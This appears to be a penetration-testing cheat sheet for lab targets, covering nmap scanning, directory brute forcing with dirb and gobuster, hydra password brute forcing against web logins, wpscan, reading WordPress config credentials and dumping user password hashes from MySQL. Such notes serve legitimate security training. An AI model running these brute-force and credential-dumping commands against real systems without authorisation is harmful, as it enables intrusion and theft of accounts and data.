Use nmap to identify live hosts on the 10.10.10.4/24 network
# nmap 10.10.10.4/24
# nmap 10.10.10.1-255
# nmap 10.10.10.4
# nmap -A 10.10.10.4 : Scan the top 1000 ports and get service versions
# nmap -sV -sC -p- 10.10.10.4 : Scan all 65535 TCP ports
# nmap -sU 10.10.10.4 : Scan UDP ports
-sV : Attempt to determine the version of the service running on each port
-sC : Scan with the default NSE scripts, considered safe and useful for discovery
-A : Enables OS detection, version detection, script scanning, and traceroute
-p- : Scan all 65535 ports
-sU : UDP ports (very slow)
-oN nmap.log : output file
The three scans can be launched in parallel in three different xterms.
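For example, each scan can run in its own xterm with its own log file (filenames are illustrative):
# nmap -A -oN nmap-quick.log 10.10.10.4
# nmap -sV -sC -p- -oN nmap-full.log 10.10.10.4
# nmap -sU -oN nmap-udp.log 10.10.10.4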
Although they can run on any port, services such as ftp, web, or ldap generally use the ports reserved for them. Port 80 for example is used by web servers for HTTP, and port 443 is the port for HTTPS.
TCP
20: ftp data
21: ftp control
22: ssh
23: telnet
25: SMTP (mail)
37: Time protocol
53: Bind/DNS
69: TFTP (Trivial FTP)
80: HTTP
109: POP2
110: POP3
111: RPC Remote Procedure Call
137: Netbios Name Service
138: Netbios Datagram Service
139: Netbios Session Service
143: IMAP (mail)
161: SNMP
220: IMAP3
389: LDAP
443: HTTPS
445: MS Active Directory, SMB
464: Kerberos
1521: Oracle Database
3000: Node JS
3306: MySQL
UDP
69: TFTP
161: SNMP
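A first targeted scan can be limited to the well-known ports listed above (a sketch; adapt the port lists to the target):
# nmap -sV -p 21,22,25,80,139,443,445 10.10.10.4
# nmap -sU -p 69,161 10.10.10.4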
http://www.0daysecurity.com/penetration-testing/enumeration.html
The robots.txt file, when it exists, is stored at the root of a website.
It contains a list of the resources of the site that are not supposed to be indexed by search engine spiders.
By convention, robots read robots.txt before indexing a website.
Its content may therefore be of interest to us.
http://10.10.10.8/robots.txt
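Its content typically looks like this (the paths below are hypothetical); every Disallow entry is worth a manual look:
User-agent: *
Disallow: /admin/
Disallow: /backup/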
More info: https://en.wikipedia.org/wiki/Robots_exclusion_standard
Developers sometimes leave useful information or even passwords in code comments. These are often URLs, or form fields used for testing.
/* Secret code */
<!-- Secret code -->
<p hidden>Secret code.</p>
<label style='display: none'>Secret code.</label>
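To quickly spot such comments or hidden elements, the page source can be fetched and filtered (a sketch; adjust the URL and the patterns):
curl -s http://10.10.10.8/ | grep -iE '<!--|hidden|display: *none|password'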
Brute forcing a website consists of testing for the presence of accessible pages, such as /register, /register.php, /admin, /upload, /users/login.txt, /admin/password.sav, ...
For this there are lists of directories and filenames frequently found on web servers.
Once the web server language/framework is known (php, java, cgi / wordpress, joomla, ...), it is possible to use optimized lists and search only the appropriate extensions: php, php4, php5, exe, jsp, ...
It is also possible to search for files with interesting extensions: cfg, txt, sav, jar, zip, sh, ...
Common web brute force tools (e.g. dirb, gobuster):
It is crucial to choose the right list of directories/filenames:
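On Kali or Parrot, such lists are typically found under /usr/share/wordlists/ (exact paths may vary with the distribution and installed packages):
ls /usr/share/wordlists/dirb/
ls /usr/share/wordlists/dirbuster/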
Dirb is usually preinstalled on Kali or Parrot. If not:
sudo apt-get install -y dirb
Run a quick scan with dirb, using its default 'common.txt' list:
dirb http://10.10.10.11
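An explicit wordlist and a file extension to append can also be given (assuming the -X option of your dirb build; check dirb's help):
dirb http://10.10.10.11 /usr/share/wordlists/dirb/common.txt -X .php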
https://github.com/OJ/gobuster
Download and install in /opt
wget https://github.com/OJ/gobuster/releases/download/v3.0.1/gobuster-linux-amd64.7z
sudo apt install p7zip-full
7z x gobuster-linux-amd64.7z
sudo cp gobuster-linux-amd64/gobuster /opt/gobuster
sudo chmod a+x /opt/gobuster
Bruteforce http://10.10.10.11, with the list 'directory-list-2.3-medium.txt', and file extensions html,php,txt:
/opt/gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.11 -l -x html,php,txt
For an HTTPS URL, add the command line option
-k : skip TLS/SSL certificate verification
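For example (same wordlist and extensions as above, assuming an HTTPS service is listening on the target):
/opt/gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.11 -l -k -x html,php,txt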
hydra -l admin -P /usr/share/wordlists/rockyou.txt -f 10.10.10.157 http-get /monitoring
-l : login
-P : password file
-f : stop as soon as a valid login/password pair is found
10.10.10.157 : target address
http-get : HTTP request type
/monitoring : URL path
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.11 http-post-form '/admin/login.php:username=^USER^&password=^PASS^:F=Wrong password:H=Cookie\: PHPSESSIONID=ms0t93n23mc2bn2512ncv1ods4' -V
Beware: if the answer is a 302 redirect, hydra will not follow it and will report a false positive.
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.4 http-get-form '/login.php:username=^USER^&password=^PASS^:F=Login failed:H=Cookie\: PHPSESSIONID=ms0t93n23mc2bn2512ncv1ods4' -V
Beware: if the answer is a 302 redirect, hydra will not follow it and will report a false positive.
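One possible workaround (verify against the target's actual responses first) is to match on a success condition with the 'S=' prefix instead of a failure string, for example on the redirect itself:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.4 http-get-form '/login.php:username=^USER^&password=^PASS^:S=302' -V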
URL formats:
Posts : /index.php?p=22
/index.php/2017/04/12/hello-world/
/index.php/jobs/apply/8/
Login : /wp-login/
/wp-login.php
Uploaded files : /wp-content/uploads/%year%/%month%/%filename%
Config file and database credentials
/var/www/html/
wordpress/wp-config.php
wordpress/htdocs/wp-config.php
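The credentials are stored as PHP defines and can be extracted quickly (assuming the standard DB_* constant names of wp-config.php):
grep -E 'DB_(NAME|USER|PASSWORD|HOST)' /var/www/html/wordpress/wp-config.php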
Wpscan knows the structure of a wordpress site and will brute force it to identify pages, posts, users, the theme, and plugins.
Wordpress flaws are mainly due to outdated plugins.
wpscan --url http://10.10.10.10/wordpress/ -e
--url : wordpress url
-e : enum pages, posts, users, theme, plugins, ...
Login bruteforce
wpscan --url http://10.10.10.10/wordpress/ -P rockyou.txt -U admin
You have found database credentials in the config file. Let's use the mysql client to connect and dump the database.
mysql --host=HOST -u USER -p
--host xx : Server IP or name
-u xx : login
-p : manually enter the password.
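For example, with the credentials recovered from wp-config.php (the user name here is hypothetical):
mysql --host=10.10.10.10 -u wordpressuser -p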
List databases.
show databases;
Ignore internal databases and choose the application database.
The database 'information_schema' contains internal information of mysql or mariadb. It can generally be ignored.
Select the application database, list the tables, then dump interesting tables such as 'users'.
use DATABASE;
show tables;
SELECT * FROM TABLENAME;
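For a WordPress database, the password hashes usually sit in the wp_users table (the database, table, and column names below assume a default WordPress install):
use wordpress;
show tables;
SELECT user_login, user_pass FROM wp_users;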